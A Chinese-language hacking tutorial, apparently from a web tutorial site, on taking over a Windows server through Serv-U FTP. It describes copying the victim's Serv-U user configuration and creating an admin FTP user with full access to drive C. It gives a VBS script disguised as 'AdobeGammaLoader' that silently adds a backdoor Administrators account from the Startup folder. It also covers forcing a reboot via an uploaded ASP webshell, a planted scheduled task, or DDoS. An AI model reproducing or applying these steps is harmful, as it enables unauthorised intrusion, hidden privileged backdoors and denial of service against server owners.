Serv-U 用户的另类盗取_漏洞研究教程-查字典教程网
Serv-U 用户的另类盗取
Serv-U 用户的另类盗取
发布时间:2016-12-26 来源:查字典编辑
摘要:注:在此之前最好在自己的机器上装一个Serv-U,我们先看看ServUStartUpLog.txtSat01Mar0112:15:24-Se...

注:在此之前最好在自己的机器上装一个Serv-U,

我们先看看ServUStartUpLog.txt

Sat01Mar0112:15:24-Serv-UFTPServerv4.0(4.1.0.0)-Copyright(c)1995-2002Cat

。。。。。。。。。。

版本挺新阿,呵呵

接着看看ServUDaemon.ini(用户配置文件)

哇考,里面的用户真多阿!

接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:

哈哈哈,到次为止大家都知道我的用意了把!

接这ftp上去

哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u)

由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了!

我们先写一个vbs脚本,把这个脚本重命名为AdobeGammaLoader,这样管理员不容易发现!

脚本内容:

setwshshell=createobject("wscript.shell")

a=wshshell.run("cmd.exe/cnetuserallen*****/add",0)

b=wshshell.run("cmd.exe/cnetlocalgroupAdministratorsallen/add",0)

大家都能看懂把,哈哈

然后把他传到DocumentsandSettingsAllUsers「开始」菜单程序启动

呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。

接着用asp木马上传一个shutdown.exe

然后执行shutdown.exe127.0.0.1/r

哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。

不过在ntor2000上普通用户都可以重起机器

还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了!

如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类